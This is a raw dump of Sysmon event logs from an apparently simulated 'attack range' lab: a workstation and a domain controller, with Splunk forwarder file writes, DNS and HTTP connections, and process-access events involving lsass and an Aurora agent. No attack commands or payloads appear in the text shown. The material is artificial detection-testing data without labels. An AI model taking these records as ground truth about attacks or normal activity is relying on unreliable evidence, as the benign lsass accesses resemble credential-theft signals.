Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56444-false10.0.1.12-8000- 23542300x800000000000000018179Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:16.479{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=46BA7A0AE8B6A5A4AEE898953CFA49D9,SHA256=C50A062FC8100A923858F0EF937058493918064A60DC98435F68501FEE0E64A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018185Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.740{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CCEEE55B9EC5D2DF3977F68B884AC4E,SHA256=67E92084FB0BE1A657FDB237FF539D3D69EBAF087377DA35AA69EA9C1BA85C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:17.040{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68655313020C2FD890C03031D9CDA85B,SHA256=4C7976D7F463CC3ABEA79647D03D46F30E8C2A6F6D0A779229675DDF596BB12F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018184Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018183Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018182Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.608{E5A8D418-DC43-63C7-0B00-00000000B002}6323836C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-0A00-00000000B002}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018181Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:15.027{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50169-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018188Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:18.838{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F4CFF6E92EBA156866D030C90FB57E,SHA256=DD27CA24FE6A9684ACE035E43594C6AD1CB6D62486053BDD50EBFA555B0DC669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:18.141{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB849750DB38BF6E7375930944BDC91D,SHA256=4B49212F62546C6CE66B362D58E151D91773A36F9B0F2F0C437B67527BB8C536,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018187Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:18.662{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6740CDB73E37C944E8C5A196A4B4F6D7,SHA256=A20949BF47D52110F2A6D6EE34EF4B1D3B3E1443404845FC7C737DC7AAE9A0E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018186Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:18.611{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-039MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018193Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:19.932{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9118F59FB4709B1A63C0FC059CAC4A5E,SHA256=893BCAC1E6E05998DC4F6A4703769F53B77EA1F44DE9DC50825AB64F66EC2C34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:19.234{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85EB7AF86C686D8265B4E4CD4B5A0894,SHA256=E415E1368F58EB2385D0D3A5043720909866633DF89BD92CCFDA1728D4C386FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018192Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:19.620{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-040MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018191Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.513{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50170-false72.21.81.240-80http 354300x800000000000000018190Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.497{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal51068-false10.0.1.14-53domain 354300x800000000000000018189Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:17.497{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:5891:e5bb:9da:ffff-51068-truea00:10e:0:0:0:0:0:0-53domain 354300x800000000000000045885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:17.178{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-east-2.compute.internal56260- 354300x800000000000000045884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:17.176{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-east-2.compute.internal56852- 354300x800000000000000045883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:17.175{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-east-2.compute.internal51068- 23542300x800000000000000045887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:20.338{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F100A342CD73E809B128270A1B0D81C9,SHA256=7D2E116442EA529794AA37661FA44437C505B2D908DE8C2304C4C71FFAED959B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:21.446{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FBCA7E007B721DB604DDB36A1984D8C,SHA256=C032941BB817005E65D651AE0ADF8DC0C384DC43278B65CA93E84926A9C97B80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018194Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:21.005{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45DEE804488261A5B2231B5764B38DEE,SHA256=1434FE603CAB1F7DED16FF0E42EA388625B6334FCED00FDFA8B60A72156D1CFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:18.688{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-east-2.compute.internal51835- 23542300x800000000000000045891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:22.530{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC9B57AC72B0E1407647B609C90A5EEB,SHA256=AB3EAFC780D03F7C7CF9E2A94A9E00C49053D37477238BB8C6EC1BD5E9E62D0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018227Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.701{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018226Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.699{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018225Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018224Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.694{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018223Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.691{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018222Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.690{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018221Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.689{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018220Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.686{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018219Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.685{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018218Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.683{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018217Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.682{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018216Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.678{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018215Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.675{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018214Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.674{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018213Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.665{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018212Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 